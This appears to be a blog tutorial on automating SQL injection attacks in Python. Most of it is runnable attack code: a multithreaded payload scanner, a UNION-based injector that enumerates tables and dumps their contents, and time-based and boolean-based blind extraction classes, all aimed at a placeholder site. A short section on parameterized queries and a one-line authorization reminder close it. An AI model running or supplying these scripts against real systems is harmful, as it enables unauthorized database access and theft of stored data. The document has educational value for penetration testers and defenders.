Automating Sql Injection Exploits
SQL injection is a critical security vulnerability that can lead to unauthorized access, data breaches, and system compromises. In this article, we’ll explore how to automate SQL injection exploits using Python, providing practical examples and use cases.
Understanding SQL Injection
SQL injection occurs when user-supplied data is inserted into SQL queries without proper sanitization. This can allow attackers to manipulate the query’s logic and execute unintended commands.
graph TB A[User Input] --> B[Web Application] B --> C[SQL Query Generation] C --> D[Database] E[Attacker Input] --> B E -.-> F[Manipulated Query] F -.-> D G[Normal Query] -.-> D H[Firewall/WAF] -.- B I[Input Validation] -.- B J[Parameterized Queries] -.- C
Basic SQL Injection Example
Let’s start with a simple example of how SQL injection works:
import sqlite3
def get_user(username):
conn = sqlite3.connect('users.db')
cursor = conn.cursor()
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchone()
# Vulnerable to SQL injection
user = get_user("admin' OR '1'='1")
print(user)
In this example, an attacker could input admin' OR '1'='1
to bypass authentication and retrieve all users.
Automating SQL Injection Discovery
Now, let’s create a more comprehensive Python script to automate the discovery of SQL injection vulnerabilities:
import requests
from urllib.parse import urljoin
import concurrent.futures
def test_sql_injection(url, param):
payloads = [
"'", "\"", "1' OR '1'='1", "1\" OR \"1\"=\"1",
"' UNION SELECT NULL--", "\" UNION SELECT NULL--",
"' AND 1=0 UNION SELECT 1,2,3--", "1' AND '1'='1",
"1 AND 1=1", "1' AND '1'='1' --"
]
for payload in payloads:
test_url = urljoin(url, f"?{param}={payload}")
response = requests.get(test_url)
if any(error in response.text.lower() for error in ["sql syntax", "mysql error", "ora-", "postgresql error"]):
print(f"Potential SQL injection found: {test_url}")
return True
return False
def scan_website(base_url, params):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_param = {executor.submit(test_sql_injection, base_url, param): param for param in params}
for future in concurrent.futures.as_completed(future_to_param):
param = future_to_param[future]
try:
if future.result():
print(f"Vulnerable parameter: {param}")
except Exception as exc:
print(f"{param} generated an exception: {exc}")
# Example usage
target_url = "http://vulnerable-website.com/users.php"
params_to_test = ["id", "username", "password", "email"]
scan_website(target_url, params_to_test)
This script tests a variety of SQL injection payloads and uses multi-threading to speed up the scanning process.
Exploiting SQL Injection with Python
Once a vulnerability is discovered, we can automate the exploitation process. Here’s an advanced example that demonstrates various SQL injection techniques:
import requests
from bs4 import BeautifulSoup
import re
class SQLInjector:
def __init__(self, url, param):
self.url = url
self.param = param
def exploit(self, payload):
exploit_url = f"{self.url}?{self.param}={payload}"
response = requests.get(exploit_url)
return response.text
def extract_data(self, payload):
result = self.exploit(payload)
soup = BeautifulSoup(result, 'html.parser')
return soup.get_text()
def union_based_injection(self):
columns = self.determine_columns()
if columns:
print(f"Number of columns: {columns}")
version = self.get_database_version(columns)
print(f"Database version: {version}")
tables = self.get_tables(columns)
print(f"Tables: {tables}")
for table in tables:
columns = self.get_columns(table, columns)
print(f"Columns in {table}: {columns}")
self.dump_data(table, columns)
def determine_columns(self):
for i in range(1, 20):
payload = f"' UNION SELECT {','.join(['NULL']*i)}--"
if "mysql error" not in self.exploit(payload).lower():
return i
return None
def get_database_version(self, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},@@version--"
return self.extract_data(payload)
def get_tables(self, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()--"
result = self.extract_data(payload)
return result.split(',')
def get_columns(self, table, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table}'--"
result = self.extract_data(payload)
return result.split(',')
def dump_data(self, table, columns):
column_list = ','.join(columns)
payload = f"' UNION SELECT {','.join(['NULL']*(len(columns)-1))},{column_list} FROM {table}--"
result = self.extract_data(payload)
print(f"Data from {table}:")
print(result)
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = SQLInjector(url, "id")
injector.union_based_injection()
This script demonstrates a more comprehensive approach to SQL injection, including techniques to determine the number of columns, extract database information, and dump table contents.
Time-Based Blind SQL Injection
For situations where we can’t see the output directly, we can use time-based techniques. Here’s an advanced example:
import requests
import time
import string
class TimeBasedSQLInjector:
def __init__(self, url, param):
self.url = url
self.param = param
self.timeout = 5
def inject(self, payload):
start_time = time.time()
requests.get(f"{self.url}?{self.param}={payload}", timeout=self.timeout)
return time.time() - start_time
def extract_data(self, query):
extracted = ""
for position in range(1, 50):
for char in string.printable:
payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{position},1))={ord(char)},SLEEP({self.timeout}),0)--"
try:
delay = self.inject(payload)
if delay >= self.timeout:
extracted += char
print(f"Found character: {char}")
break
except requests.Timeout:
extracted += char
print(f"Found character: {char}")
break
if len(extracted) < position:
break
return extracted
def get_database_version(self):
return self.extract_data("SELECT VERSION()")
def get_current_user(self):
return self.extract_data("SELECT CURRENT_USER()")
def get_database_name(self):
return self.extract_data("SELECT DATABASE()")
def get_tables(self):
return self.extract_data("SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()")
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = TimeBasedSQLInjector(url, "id")
print(f"Database version: {injector.get_database_version()}")
print(f"Current user: {injector.get_current_user()}")
print(f"Current database: {injector.get_database_name()}")
print(f"Tables: {injector.get_tables()}")
This script uses time delays to infer information about the database structure and content, even when there’s no visible output.
Boolean-Based Blind SQL Injection
Another technique for blind SQL injection is using boolean-based queries:
import requests
class BooleanBasedSQLInjector:
def __init__(self, url, param, true_condition, false_condition):
self.url = url
self.param = param
self.true_condition = true_condition
self.false_condition = false_condition
def inject(self, payload):
response = requests.get(f"{self.url}?{self.param}={payload}")
return self.true_condition in response.text
def extract_data(self, query):
extracted = ""
for position in range(1, 50):
left, right = 32, 126
while left <= right:
mid = (left + right) // 2
payload = f"1' AND ASCII(SUBSTRING(({query}),{position},1))>{mid}--"
if self.inject(payload):
left = mid + 1
else:
right = mid - 1
if left == 32:
break
extracted += chr(left)
print(f"Found character: {chr(left)}")
return extracted
def get_database_version(self):
return self.extract_data("SELECT VERSION()")
def get_current_user(self):
return self.extract_data("SELECT CURRENT_USER()")
def get_database_name(self):
return self.extract_data("SELECT DATABASE()")
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = BooleanBasedSQLInjector(url, "id", "Login successful", "Login failed")
print(f"Database version: {injector.get_database_version()}")
print(f"Current user: {injector.get_current_user()}")
print(f"Current database: {injector.get_database_name()}")
This script uses binary search to efficiently extract data using boolean-based blind SQL injection.
Preventing SQL Injection
To prevent SQL injection, always use parameterized queries or prepared statements. Here’s an example using SQLAlchemy, a popular Python SQL toolkit:
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
# Create an engine and session
engine = create_engine('sqlite:///users.db')
Session = sessionmaker(bind=engine)
session = Session()
def get_user_secure(username):
# Use parameterized query
query = text("SELECT * FROM users WHERE username = :username")
result = session.execute(query, {"username": username})
return result.fetchone()
# Safe from SQL injection
user = get_user_secure("admin' --")
print(user)
# Using ORM for even better security
from sqlalchemy.orm import declarative_base
from sqlalchemy import Column, Integer, String
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
username = Column(String)
password = Column(String)
def get_user_orm(username):
return session.query(User).filter(User.username == username).first()
# Completely safe from SQL injection
user = get_user_orm("admin' --")
print(user)
This example demonstrates the use of parameterized queries and an Object-Relational Mapping (ORM) to prevent SQL injection vulnerabilities.
Conclusion
Automating SQL injection techniques can be powerful for both attackers and defenders. As security professionals, understanding these methods is crucial for identifying and mitigating vulnerabilities in web applications.
Remember, always obtain proper authorization before testing any system for vulnerabilities, and use this knowledge responsibly to improve security.
Here are some additional best practices for preventing SQL injection:
- Input Validation: Implement strict input validation on both client and server sides.
- Least Privilege: Use database accounts with minimal necessary privileges.
- Web Application Firewall (WAF): Implement a WAF to filter malicious requests.
- Regular Updates: Keep all software components up-to-date with the latest security patches.
- Security Testing: Regularly perform security assessments and penetration testing.
The mathematical probability of preventing SQL injection can be expressed as:
$$ P(\text{Prevention}) = 1 - \prod_{i=1}^{n} (1 - P(\text{Measure}_i)) $$
Where $P(\text{Measure}_i)$ is the probability of each preventive measure being effective, and $n$ is the number of measures implemented.